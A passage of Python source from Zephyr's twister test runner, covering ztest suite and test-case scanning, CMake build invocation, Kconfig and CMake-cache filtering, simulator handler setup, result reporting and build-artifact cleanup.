# stc_regex below to catch the ones that are declared in the same
# line--as we only search starting the end of this match
br"^\s*ztest_test_suite\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
registered_suite_regex = re.compile(
br"^\s*ztest_register_test_suite"
br"\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
new_suite_regex = re.compile(
br"^\s*ZTEST_SUITE\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
# Checks if the file contains a definition of "void test_main(void)"
# Since ztest provides a plain test_main implementation it is OK to:
# 1. register test suites and not call the run function iff the test
# doesn't have a custom test_main.
# 2. register test suites and a custom test_main definition iff the test
# also calls ztest_run_registered_test_suites.
test_main_regex = re.compile(
br"^\s*void\s+test_main\(void\)",
re.MULTILINE)
registered_suite_run_regex = re.compile(
br"^\s*ztest_run_registered_test_suites\("
br"(\*+|&)?(?P<state_identifier>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
warnings = None
has_registered_test_suites = False
has_run_registered_test_suites = False
has_test_main = False
with open(inf_name) as inf:
if os.name == 'nt':
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'access': mmap.ACCESS_READ}
else:
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'flags': mmap.MAP_PRIVATE, 'prot': mmap.PROT_READ,
'offset': 0}
with contextlib.closing(mmap.mmap(**mmap_args)) as main_c:
regular_suite_regex_matches = \
[m for m in regular_suite_regex.finditer(main_c)]
registered_suite_regex_matches = \
[m for m in registered_suite_regex.finditer(main_c)]
new_suite_regex_matches = \
[m for m in new_suite_regex.finditer(main_c)]
if registered_suite_regex_matches:
has_registered_test_suites = True
if registered_suite_run_regex.search(main_c):
has_run_registered_test_suites = True
if test_main_regex.search(main_c):
has_test_main = True
if regular_suite_regex_matches:
ztest_suite_names = \
self._extract_ztest_suite_names(regular_suite_regex_matches)
testcase_names, warnings = \
self._find_regular_ztest_testcases(main_c, regular_suite_regex_matches, has_registered_test_suites)
elif registered_suite_regex_matches:
ztest_suite_names = \
self._extract_ztest_suite_names(registered_suite_regex_matches)
testcase_names, warnings = \
self._find_regular_ztest_testcases(main_c, registered_suite_regex_matches, has_registered_test_suites)
elif new_suite_regex_matches:
ztest_suite_names = \
self._extract_ztest_suite_names(new_suite_regex_matches)
testcase_names, warnings = \
self._find_new_ztest_testcases(main_c)
else:
# can't find ztest_test_suite, maybe a client, because
# it includes ztest.h
ztest_suite_names = []
testcase_names, warnings = None, None
return ScanPathResult(
matches=testcase_names,
warnings=warnings,
has_registered_test_suites=has_registered_test_suites,
has_run_registered_test_suites=has_run_registered_test_suites,
has_test_main=has_test_main,
ztest_suite_names=ztest_suite_names)
@staticmethod
def _extract_ztest_suite_names(suite_regex_matches):
ztest_suite_names = \
[m.group("suite_name") for m in suite_regex_matches]
ztest_suite_names = \
[name.decode("UTF-8") for name in ztest_suite_names]
return ztest_suite_names
def _find_regular_ztest_testcases(self, search_area, suite_regex_matches, is_registered_test_suite):
"""
Find regular ztest testcases like "ztest_unit_test" or similar. Return
testcases' names and eventually found warnings.
"""
testcase_regex = re.compile(
br"""^\s* # empty space at the beginning is ok
# catch the case where it is declared in the same sentence, e.g:
#
# ztest_test_suite(mutex_complex, ztest_user_unit_test(TESTNAME));
# ztest_register_test_suite(n, p, ztest_user_unit_test(TESTNAME),
(?:ztest_
(?:test_suite\(|register_test_suite\([a-zA-Z0-9_]+\s*,\s*)
[a-zA-Z0-9_]+\s*,\s*
)?
# Catch ztest[_user]_unit_test-[_setup_teardown](TESTNAME)
ztest_(?:1cpu_)?(?:user_)?unit_test(?:_setup_teardown)?
# Consume the argument that becomes the extra testcase
\(\s*(?P<testcase_name>[a-zA-Z0-9_]+)
# _setup_teardown() variant has two extra arguments that we ignore
(?:\s*,\s*[a-zA-Z0-9_]+\s*,\s*[a-zA-Z0-9_]+)?
\s*\)""",
# We don't check how it finishes; we don't care
re.MULTILINE | re.VERBOSE)
achtung_regex = re.compile(
br"(#ifdef|#endif)",
re.MULTILINE)
search_start, search_end = \
self._get_search_area_boundary(search_area, suite_regex_matches, is_registered_test_suite)
limited_search_area = search_area[search_start:search_end]
testcase_names, warnings = \
self._find_ztest_testcases(limited_search_area, testcase_regex)
achtung_matches = re.findall(achtung_regex, limited_search_area)
if achtung_matches and warnings is None:
achtung = ", ".join(sorted({match.decode() for match in achtung_matches},reverse = True))
warnings = f"found invalid {achtung} in ztest_test_suite()"
return testcase_names, warnings
@staticmethod
def _get_search_area_boundary(search_area, suite_regex_matches, is_registered_test_suite):
"""
Get search area boundary based on "ztest_test_suite(...)",
"ztest_register_test_suite(...)" or "ztest_run_test_suite(...)"
functions occurrence.
"""
suite_run_regex = re.compile(
br"^\s*ztest_run_test_suite\((?P<suite_name>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
search_start = suite_regex_matches[0].end()
suite_run_match = suite_run_regex.search(search_area)
if suite_run_match:
search_end = suite_run_match.start()
elif not suite_run_match and not is_registered_test_suite:
raise ValueError("can't find ztest_run_test_suite")
else:
search_end = re.compile(br"\);", re.MULTILINE) \
.search(search_area, search_start) \
.end()
return search_start, search_end
def _find_new_ztest_testcases(self, search_area):
"""
Find regular ztest testcases like "ZTEST" or "ZTEST_F". Return
testcases' names and eventually found warnings.
"""
testcase_regex = re.compile(
br"^\s*(?:ZTEST|ZTEST_F)\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,"
br"\s*(?P<testcase_name>[a-zA-Z0-9_]+)\s*",
re.MULTILINE)
return self._find_ztest_testcases(search_area, testcase_regex)
@staticmethod
def _find_ztest_testcases(search_area, testcase_regex):
"""
Parse search area and try to find testcases defined in testcase_regex
argument. Return testcase names and eventually found warnings.
"""
testcase_regex_matches = \
[m for m in testcase_regex.finditer(search_area)]
testcase_names = \
[m.group("testcase_name") for m in testcase_regex_matches]
testcase_names = [name.decode("UTF-8") for name in testcase_names]
warnings = None
for testcase_name in testcase_names:
if not testcase_name.startswith("test_"):
warnings = "Found a test that does not start with test_"
testcase_names = \
[tc_name.replace("test_", "", 1) for tc_name in testcase_names]
return testcase_names, warnings
def scan_path(self, path):
subcases = []
has_registered_test_suites = False
has_run_registered_test_suites = False
has_test_main = False
ztest_suite_names = []
src_dir_path = self._find_src_dir_path(path)
for filename in glob.glob(os.path.join(src_dir_path, "*.c*")):
try:
result: ScanPathResult = self.scan_file(filename)
if result.warnings:
logger.error("%s: %s" % (filename, result.warnings))
raise TwisterRuntimeError(
"%s: %s" % (filename, result.warnings))
if result.matches:
subcases += result.matches
if result.has_registered_test_suites:
has_registered_test_suites = True
if result.has_run_registered_test_suites:
has_run_registered_test_suites = True
if result.has_test_main:
has_test_main = True
if result.ztest_suite_names:
ztest_suite_names += result.ztest_suite_names
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
for filename in glob.glob(os.path.join(path, "*.c")):
try:
result: ScanPathResult = self.scan_file(filename)
if result.warnings:
logger.error("%s: %s" % (filename, result.warnings))
if result.matches:
subcases += result.matches
if result.ztest_suite_names:
ztest_suite_names += result.ztest_suite_names
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
if (has_registered_test_suites and has_test_main and
not has_run_registered_test_suites):
warning = \
"Found call to 'ztest_register_test_suite()' but no "\
"call to 'ztest_run_registered_test_suites()'"
logger.error(warning)
raise TwisterRuntimeError(warning)
return subcases, ztest_suite_names
def parse_subcases(self, test_path):
subcases, ztest_suite_names = self.scan_path(test_path)
for sub in subcases:
name = "{}.{}".format(self.id, sub)
self.cases.append(name)
if not subcases:
self.cases.append(self.id)
self.ztest_suite_names = ztest_suite_names
@staticmethod
def _find_src_dir_path(test_dir_path):
"""
Try to find src directory with test source code. Sometimes due to the
optimization reasons it is placed in upper directory.
"""
src_dir_name = "src"
src_dir_path = os.path.join(test_dir_path, src_dir_name)
if os.path.isdir(src_dir_path):
return src_dir_path
src_dir_path = os.path.join(test_dir_path, "..", src_dir_name)
if os.path.isdir(src_dir_path):
return src_dir_path
return ""
def __str__(self):
return self.name
class TestInstance(DisablePyTestCollectionMixin):
"""Class representing the execution of a particular TestCase on a platform
@param test The TestCase object we want to build/execute
@param platform Platform object that we want to build and run against
@param base_outdir Base directory for all test results. The actual
out directory used is <outdir>/<platform>/<test case name>
"""
def __init__(self, testcase, platform, outdir):
self.testcase = testcase
self.platform = platform
self.status = None
self.reason = "Unknown"
self.metrics = dict()
self.handler = None
self.outdir = outdir
self.name = os.path.join(platform.name, testcase.name)
self.run_id = self._get_run_id()
self.build_dir = os.path.join(outdir, platform.name, testcase.name)
self.run = False
self.results = {}
def _get_run_id(self):
""" generate run id from instance unique identifier and a random
number"""
hash_object = hashlib.md5(self.name.encode())
random_str = f"{random.getrandbits(64)}".encode()
hash_object.update(random_str)
return hash_object.hexdigest()
def __getstate__(self):
d = self.__dict__.copy()
return d
def __setstate__(self, d):
self.__dict__.update(d)
def __lt__(self, other):
return self.name < other.name
@staticmethod
def testcase_runnable(testcase, fixtures):
can_run = False
# console harness allows us to run the test and capture data.
if testcase.harness in [ 'console', 'ztest', 'pytest']:
can_run = True
# if we have a fixture that is also being supplied on the
# command-line, then we need to run the test, not just build it.
fixture = testcase.harness_config.get('fixture')
if fixture:
can_run = (fixture in fixtures)
elif testcase.harness:
can_run = False
else:
can_run = True
return can_run
# Global testsuite parameters
def check_runnable(self, enable_slow=False, filter='buildable', fixtures=[]):
# right now we only support building on windows. running is still work
# in progress.
if os.name == 'nt':
return False
# we asked for build-only on the command line
if self.testcase.build_only:
return False
# Do not run slow tests:
skip_slow = self.testcase.slow and not enable_slow
if skip_slow:
return False
target_ready = bool(self.testcase.type == "unit" or \
self.platform.type == "native" or \
self.platform.simulation in ["mdb-nsim", "nsim", "renode", "qemu", "tsim", "armfvp", "xt-sim"] or \
filter == 'runnable')
if self.platform.simulation == "nsim":
if not find_executable("nsimdrv"):
target_ready = False
if self.platform.simulation == "mdb-nsim":
if not find_executable("mdb"):
target_ready = False
if self.platform.simulation == "renode":
if not find_executable("renode"):
target_ready = False
if self.platform.simulation == "tsim":
if not find_executable("tsim-leon3"):
target_ready = False
testcase_runnable = self.testcase_runnable(self.testcase, fixtures)
return testcase_runnable and target_ready
def create_overlay(self, platform, enable_asan=False, enable_ubsan=False, enable_coverage=False, coverage_platform=[]):
# Create this in a "twister/" subdirectory otherwise this
# will pass this overlay to kconfig.py *twice* and kconfig.cmake
# will silently give that second time precedence over any
# --extra-args=CONFIG_*
subdir = os.path.join(self.build_dir, "twister")
content = ""
if self.testcase.extra_configs:
content = "\n".join(self.testcase.extra_configs)
if enable_coverage:
if platform.name in coverage_platform:
content = content + "\nCONFIG_COVERAGE=y"
content = content + "\nCONFIG_COVERAGE_DUMP=y"
if enable_asan:
if platform.type == "native":
content = content + "\nCONFIG_ASAN=y"
if enable_ubsan:
if platform.type == "native":
content = content + "\nCONFIG_UBSAN=y"
if content:
os.makedirs(subdir, exist_ok=True)
file = os.path.join(subdir, "testcase_extra.conf")
with open(file, "w") as f:
f.write(content)
return content
def calculate_sizes(self):
"""Get the RAM/ROM sizes of a test case.
This can only be run after the instance has been executed by
MakeGenerator, otherwise there won't be any binaries to measure.
@return A SizeCalculator object
"""
fns = glob.glob(os.path.join(self.build_dir, "zephyr", "*.elf"))
fns.extend(glob.glob(os.path.join(self.build_dir, "zephyr", "*.exe")))
fns = [x for x in fns if '_pre' not in x]
if len(fns) != 1:
raise BuildError("Missing/multiple output ELF binary")
return SizeCalculator(fns[0], self.testcase.extra_sections)
def fill_results_by_status(self):
"""Fills results according to self.status
The method is used to propagate the instance level status
to the test cases inside. Useful when the whole instance is skipped
and the info is required also at the test cases level for reporting.
Should be used with caution, e.g. should not be used
to fill all results with passes
"""
status_to_verdict = {
'skipped': 'SKIP',
'error': 'BLOCK',
'failure': 'FAILED'
}
for k in self.results:
self.results[k] = status_to_verdict[self.status]
def __repr__(self):
return "<TestCase %s on %s>" % (self.testcase.name, self.platform.name)
class CMake():
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
def __init__(self, testcase, platform, source_dir, build_dir):
self.cwd = None
self.capture_output = True
self.defconfig = {}
self.cmake_cache = {}
self.instance = None
self.testcase = testcase
self.platform = platform
self.source_dir = source_dir
self.build_dir = build_dir
self.log = "build.log"
self.generator = None
self.generator_cmd = None
self.default_encoding = sys.getdefaultencoding()
def parse_generated(self):
self.defconfig = {}
return {}
def run_build(self, args=[]):
logger.debug("Building %s for %s" % (self.source_dir, self.platform.name))
cmake_args = []
cmake_args.extend(args)
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
results = {}
if p.returncode == 0:
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
self.instance.status = "passed"
results = {'msg': msg, "returncode": p.returncode, "instance": self.instance}
if out:
log_msg = out.decode(self.default_encoding)
with open(os.path.join(self.build_dir, self.log), "a", encoding=self.default_encoding) as log:
log.write(log_msg)
else:
return None
else:
# A real error occurred, raise an exception
log_msg = ""
if out:
log_msg = out.decode(self.default_encoding)
with open(os.path.join(self.build_dir, self.log), "a", encoding=self.default_encoding) as log:
log.write(log_msg)
if log_msg:
res = re.findall("region `(FLASH|ROM|RAM|ICCM|DCCM|SRAM)' overflowed by", log_msg)
if res and not self.overflow_as_errors:
logger.debug("Test skipped due to {} Overflow".format(res[0]))
self.instance.status = "skipped"
self.instance.reason = "{} overflow".format(res[0])
else:
self.instance.status = "error"
self.instance.reason = "Build failure"
results = {
"returncode": p.returncode,
"instance": self.instance,
}
return results
def run_cmake(self, args=[]):
if self.warnings_as_errors:
ldflags = "-Wl,--fatal-warnings"
cflags = "-Werror"
aflags = "-Werror -Wa,--fatal-warnings"
gen_defines_args = "--edtlib-Werror"
else:
ldflags = cflags = aflags = ""
gen_defines_args = ""
logger.debug("Running cmake on %s for %s" % (self.source_dir, self.platform.name))
cmake_args = [
f'-B{self.build_dir}',
f'-S{self.source_dir}',
f'-DTC_RUNID={self.instance.run_id}',
f'-DEXTRA_CFLAGS={cflags}',
f'-DEXTRA_AFLAGS={aflags}',
f'-DEXTRA_LDFLAGS={ldflags}',
f'-DEXTRA_GEN_DEFINES_ARGS={gen_defines_args}',
f'-G{self.generator}'
]
args = ["-D{}".format(a.replace('"', '')) for a in args]
cmake_args.extend(args)
cmake_opts = ['-DBOARD={}'.format(self.platform.name)]
cmake_args.extend(cmake_opts)
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
if p.returncode == 0:
filter_results = self.parse_generated()
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
logger.debug(msg)
results = {'msg': msg, 'filter': filter_results}
else:
self.instance.status = "error"
self.instance.reason = "Cmake build failure"
self.instance.fill_results_by_status()
logger.error("Cmake build failure: %s for %s" % (self.source_dir, self.platform.name))
results = {"returncode": p.returncode}
if out:
with open(os.path.join(self.build_dir, self.log), "a", encoding=self.default_encoding) as log:
log_msg = out.decode(self.default_encoding)
log.write(log_msg)
return results
@staticmethod
def run_cmake_script(args=[]):
logger.debug("Running cmake script %s" % (args[0]))
cmake_args = ["-D{}".format(a.replace('"', '')) for a in args[1:]]
cmake_args.extend(['-P', args[0]])
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
if not cmake:
msg = "Unable to find `cmake` in path"
logger.error(msg)
raise Exception(msg)
cmd = [cmake] + cmake_args
kwargs = dict()
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
# It might happen that the environment adds ANSI escape codes like \x1b[0m,
# for instance if twister is executed from inside a makefile. In such a
# scenario it is then necessary to remove them, as otherwise the JSON decoding
# will fail.
ansi_escape = re.compile(r'\x1B(?:[@-Z\\-_]|\[[0-?]*[ -/]*[@-~])')
out = ansi_escape.sub('', out.decode())
if p.returncode == 0:
msg = "Finished running %s" % (args[0])
logger.debug(msg)
results = {"returncode": p.returncode, "msg": msg, "stdout": out}
else:
logger.error("Cmake script failure: %s" % (args[0]))
results = {"returncode": p.returncode, "returnmsg": out}
return results
class FilterBuilder(CMake):
def __init__(self, testcase, platform, source_dir, build_dir):
super().__init__(testcase, platform, source_dir, build_dir)
self.log = "config-twister.log"
def parse_generated(self):
if self.platform.name == "unit_testing":
return {}
cmake_cache_path = os.path.join(self.build_dir, "CMakeCache.txt")
defconfig_path = os.path.join(self.build_dir, "zephyr", ".config")
with open(defconfig_path, "r") as fp:
defconfig = {}
for line in fp.readlines():
m = self.config_re.match(line)
if not m:
if line.strip() and not line.startswith("#"):
sys.stderr.write("Unrecognized line %s\n" % line)
continue
defconfig[m.group(1)] = m.group(2).strip()
self.defconfig = defconfig
cmake_conf = {}
try:
cache = CMakeCache.from_file(cmake_cache_path)
except FileNotFoundError:
cache = {}
for k in iter(cache):
cmake_conf[k.name] = k.value
self.cmake_cache = cmake_conf
filter_data = {
"ARCH": self.platform.arch,
"PLATFORM": self.platform.name
}
filter_data.update(os.environ)
filter_data.update(self.defconfig)
filter_data.update(self.cmake_cache)
edt_pickle = os.path.join(self.build_dir, "zephyr", "edt.pickle")
if self.testcase and self.testcase.tc_filter:
try:
if os.path.exists(edt_pickle):
with open(edt_pickle, 'rb') as f:
edt = pickle.load(f)
else:
edt = None
res = expr_parser.parse(self.testcase.tc_filter, filter_data, edt)
except (ValueError, SyntaxError) as se:
sys.stderr.write(
"Failed processing %s\n" % self.testcase.yamlfile)
raise se
if not res:
return {os.path.join(self.platform.name, self.testcase.name): True}
else:
return {os.path.join(self.platform.name, self.testcase.name): False}
else:
self.platform.filter_data = filter_data
return filter_data
class ProjectBuilder(FilterBuilder):
def __init__(self, suite, instance, **kwargs):
super().__init__(instance.testcase, instance.platform, instance.testcase.source_dir, instance.build_dir)
self.log = "build.log"
self.instance = instance
self.suite = suite
self.filtered_tests = 0
self.lsan = kwargs.get('lsan', False)
self.asan = kwargs.get('asan', False)
self.ubsan = kwargs.get('ubsan', False)
self.valgrind = kwargs.get('valgrind', False)
self.extra_args = kwargs.get('extra_args', [])
self.device_testing = kwargs.get('device_testing', False)
self.cmake_only = kwargs.get('cmake_only', False)
self.cleanup = kwargs.get('cleanup', False)
self.coverage = kwargs.get('coverage', False)
self.inline_logs = kwargs.get('inline_logs', False)
self.generator = kwargs.get('generator', None)
self.generator_cmd = kwargs.get('generator_cmd', None)
self.verbose = kwargs.get('verbose', None)
self.warnings_as_errors = kwargs.get('warnings_as_errors', True)
self.overflow_as_errors = kwargs.get('overflow_as_errors', False)
self.suite_name_check = kwargs.get('suite_name_check', True)
@staticmethod
def log_info(filename, inline_logs):
filename = os.path.abspath(os.path.realpath(filename))
if inline_logs:
logger.info("{:-^100}".format(filename))
try:
with open(filename) as fp:
data = fp.read()
except Exception as e:
data = "Unable to read log data (%s)\n" % (str(e))
logger.error(data)
logger.info("{:-^100}".format(filename))
else:
logger.error("see: " + Fore.YELLOW + filename + Fore.RESET)
def log_info_file(self, inline_logs):
build_dir = self.instance.build_dir
h_log = "{}/handler.log".format(build_dir)
b_log = "{}/build.log".format(build_dir)
v_log = "{}/valgrind.log".format(build_dir)
d_log = "{}/device.log".format(build_dir)
if os.path.exists(v_log) and "Valgrind" in self.instance.reason:
self.log_info("{}".format(v_log), inline_logs)
elif os.path.exists(h_log) and os.path.getsize(h_log) > 0:
self.log_info("{}".format(h_log), inline_logs)
elif os.path.exists(d_log) and os.path.getsize(d_log) > 0:
self.log_info("{}".format(d_log), inline_logs)
else:
self.log_info("{}".format(b_log), inline_logs)
def setup_handler(self):
instance = self.instance
args = []
# FIXME: Needs simplification
if instance.platform.simulation == "qemu":
instance.handler = QEMUHandler(instance, "qemu")
args.append("QEMU_PIPE=%s" % instance.handler.get_fifo())
instance.handler.call_make_run = True
elif instance.testcase.type == "unit":
instance.handler = BinaryHandler(instance, "unit")
instance.handler.binary = os.path.join(instance.build_dir, "testbinary")
if self.coverage:
args.append("COVERAGE=1")
elif instance.platform.type == "native":
handler = BinaryHandler(instance, "native")
handler.asan = self.asan
handler.valgrind = self.valgrind
handler.lsan = self.lsan
handler.ubsan = self.ubsan
handler.coverage = self.coverage
handler.binary = os.path.join(instance.build_dir, "zephyr", "zephyr.exe")
instance.handler = handler
elif instance.platform.simulation == "renode":
if find_executable("renode"):
instance.handler = BinaryHandler(instance, "renode")
instance.handler.pid_fn = os.path.join(instance.build_dir, "renode.pid")
instance.handler.call_make_run = True
elif instance.platform.simulation == "tsim":
instance.handler = BinaryHandler(instance, "tsim")
instance.handler.call_make_run = True
elif self.device_testing:
instance.handler = DeviceHandler(instance, "device")
instance.handler.coverage = self.coverage
elif instance.platform.simulation == "nsim":
if find_executable("nsimdrv"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "mdb-nsim":
if find_executable("mdb"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "armfvp":
instance.handler = BinaryHandler(instance, "armfvp")
instance.handler.call_make_run = True
elif instance.platform.simulation == "xt-sim":
instance.handler = BinaryHandler(instance, "xt-sim")
instance.handler.call_make_run = True
if instance.handler:
instance.handler.args = args
instance.handler.generator_cmd = self.generator_cmd
instance.handler.generator = self.generator
instance.handler.suite_name_check = self.suite_name_check
def process(self, pipeline, done, message, lock, results):
op = message.get('op')
if not self.instance.handler:
self.setup_handler()
# The build process, call cmake and build with configured generator
if op == "cmake":
res = self.cmake()
if self.instance.status in ["failed", "error"]:
pipeline.put({"op": "report", "test": self.instance})
elif self.cmake_only:
if self.instance.status is None:
self.instance.status = "passed"
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.name in res['filter'] and res['filter'][self.instance.name]:
logger.debug("filtering %s" % self.instance.name)
self.instance.status = "skipped"
self.instance.reason = "filter"
results.skipped_runtime += 1
for case in self.instance.testcase.cases:
self.instance.results.update({case: 'SKIP'})
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "build", "test": self.instance})
elif op == "build":
logger.debug("build test: %s" % self.instance.name)
res = self.build()
if not res:
self.instance.status = "error"
self.instance.reason = "Build Failure"
pipeline.put({"op": "report", "test": self.instance})
else:
# Count skipped cases during build, for example
# due to ram/rom overflow.
inst = res.get("instance", None)
if inst and inst.status == "skipped":
results.skipped_runtime += 1
if res.get('returncode', 1) > 0:
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "gather_metrics", "test": self.instance})
elif op == "gather_metrics":
self.gather_metrics(self.instance)
if self.instance.run and self.instance.handler:
pipeline.put({"op": "run", "test": self.instance})
else:
pipeline.put({"op": "report", "test": self.instance})
# Run the generated binary using one of the supported handlers
elif op == "run":
logger.debug("run test: %s" % self.instance.name)
self.run()
self.instance.status, _ = self.instance.handler.get_state()
logger.debug(f"run status: {self.instance.name} {self.instance.status}")
# to make it work with pickle
self.instance.handler.thread = None
self.instance.handler.suite = None
pipeline.put({
"op": "report",
"test": self.instance,
"status": self.instance.status,
"reason": self.instance.reason
}
)
# Report results and output progress to screen
elif op == "report":
with lock:
done.put(self.instance)
self.report_out(results)
if self.cleanup and not self.coverage and self.instance.status == "passed":
pipeline.put({
"op": "cleanup",
"test": self.instance
})
elif op == "cleanup":
if self.device_testing:
self.cleanup_device_testing_artifacts()
else:
self.cleanup_artifacts()
def cleanup_artifacts(self, additional_keep=[]):
logger.debug("Cleaning up {}".format(self.instance.build_dir))
allow = [
'zephyr/.config',
'handler.log',
'build.log',
'device.log',
'recording.csv',
]
allow += additional_keep
allow = [os.path.join(self.instance.build_dir, file) for file in allow]
for dirpath, dirnames, filenames in os.walk(self.instance.build_dir, topdown=False):
for name in filenames:
path = os.path.join(dirpath, name)
if path not in allow:
os.remove(path)
# Remove empty directories and symbolic links to directories
for dir in dirnames:
path = os.path.join(dirpath, dir)
if os.path.islink(path):
os.remove(path)
elif not os.listdir(path):
os.rmdir(path)
def cleanup_device_testing_artifacts(self):
logger.debug("Cleaning up for Device Testing {}".format(self.instance.build_dir))
sanitizelist = [
'CMakeCache.txt',
'zephyr/runners.yaml',
]
keep = [
'zephyr/zephyr.hex',
'zephyr/zephyr.bin',
'zephyr/zephyr.elf',
]
keep += sanitizelist
self.cleanup_artifacts(keep)
# sanitize paths so files are relocatable
for file in sanitizelist:
file = os.path.join(self.instance.build_dir, file)
with open(file, "rt") as fin:
data = fin.read()
data = data.replace(canonical_zephyr_base+"/", "")
with open(file, "wt") as fin:
fin.write(data)
def report_out(self, results):
total_to_do = results.total
total_tests_width = len(str(total_to_do))
results.done += 1
instance = self.instance
if instance.status in ["error", "failed", "timeout", "flash_error"]:
if instance.status == "error":
results.error += 1
results.failed += 1
if self.verbose:
status = Fore.RED + "FAILED " + Fore.RESET + instance.reason
else:
print("")
logger.error(
"{:<25} {:<50} {}FAILED{}: {}".format(
instance.platform.name,
instance.testcase.name,
Fore.RED,
Fore.RESET,
instance.reason))
if not self.verbose:
self.log_info_file(self.inline_logs)
elif instance.status == "skipped":
status = Fore.YELLOW + "SKIPPED" + Fore.RESET
results.skipped_configs += 1
results.skipped_cases += len(instance.testcase.cases)
elif instance.status == "passed":
status = Fore.GREEN + "PASSED" + Fore.RESET
results.passed += 1
for res in instance.results.values():
if res == 'SKIP':
results.skipped_cases += 1
else:
logger.debug(f"Unknown status = {instance.status}")
status = Fore.YELLOW + "UNKNOWN" + Fore.RESET
if self.verbose:
if self.cmake_only:
more_info = "cmake"
elif instance.status == "skipped":
more_info = instance.reason
else:
if instance.handler and instance.run:
more_info = instance.handler.type_str
htime = instance.handler.duration
if htime:
more_info += " {:.3f}s".format(htime)
else:
more_info = "build"
logger.info("{:>{}}/{} {:<25} {:<50} {} ({})".format(
results.done + results.skipped_filter, total_tests_width, total_to_do , instance.platform.name,
instance.testcase.name, status, more_info))
if instance.status in ["error", "failed", "timeout"]:
self.log_info_file(self.inline_logs)
else:
completed_perc = 0
if total_to_do > 0:
completed_perc = int((float(results.done + results.skipped_filter) / total_to_do) * 100)
sys.stdout.write("\rINFO - Total complete: %s%4d/%4d%s %2d%% skipped: %s%4d%s, failed: %s%4d%s" % (
Fore.GREEN,
results.done + results.skipped_filter,
total_to_do,
Fore.RESET,
completed_perc,
Fore.YELLOW if results.skipped_configs > 0 else Fore.RESET,
results.skipped_filter + results.skipped_runtime,
Fore.RESET,
Fore.RED if results.failed > 0 else Fore.RESET,
results.failed,
Fore.RESET
)
)
sys.stdout.flush()
def cmake(self):
instance = self.instance
args = self.testcase.extra_args[:]
args += self.extra_args
if instance.handler:
args += instance.handler.args
# merge overlay files into one variable
def extract_overlays(args):
re_overlay = re.compile('OVERLAY_CONFIG=(.*)')
other_args = []
overlays = []
for arg in args:
match = re_overlay.search(arg)
if match:
overlays.append(match.group(1).strip('\'"'))
else:
other_args.append(arg)
args[:] = other_args
return overlays
overlays = extract_overlays(args)
if os.path.exists(os.path.join(instance.build_dir,
"twister", "testcase_extra.conf")):
overlays.append(os.path.join(instance.build_dir,
"twister", "testcase_extra.conf"))
if overlays:
args.append("OVERLAY_CONFIG=\"%s\"" % (" ".join(overlays)))
res = self.run_cmake(args)
return res
def build(self):
res = self.run_build(['--build', self.build_dir])
return res
def run(self):
instance = self.instance
if instance.handler:
if instance.handler.type_str == "device":
instance.handler.suite = self.suite
instance.handler.handle()
sys.stdout.flush()
def gather_metrics(self, instance):
if self.suite.enable_size_report and not self.suite.cmake_only:
self.calc_one_elf_size(instance)
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
@staticmethod
def calc_one_elf_size(instance):
if instance.status not in ["error", "failed", "skipped"]:
if instance.platform.type != "native":
size_calc = instance.calculate_sizes()
instance.metrics["ram_size"] = size_calc.get_ram_size()
instance.metrics["rom_size"] = size_calc.get_rom_size()
instance.metrics["unrecognized"] = size_calc.unrecognized_sections()
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
class TestSuite(DisablePyTestCollectionMixin):
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
tc_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "testcase-schema.yaml"))
quarantine_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "quarantine-schema.yaml"))
testcase_valid_keys = {"tags": {"type": "set", "required": False},
"type": {"type": "str", "default": "integration"},
"extra_args": {"type": "list"},
"extra_configs": {"type": "list"},
"build_only": {"type": "bool", "default": False},
"build_on_all": {"type": "bool", "default": False},
"skip": {"type": "bool", "default": False},
"slow": {"type": "bool", "default": False},
"timeout": {"type": "int", "default": 60},
"min_ram": {"type": "int", "default": 8},
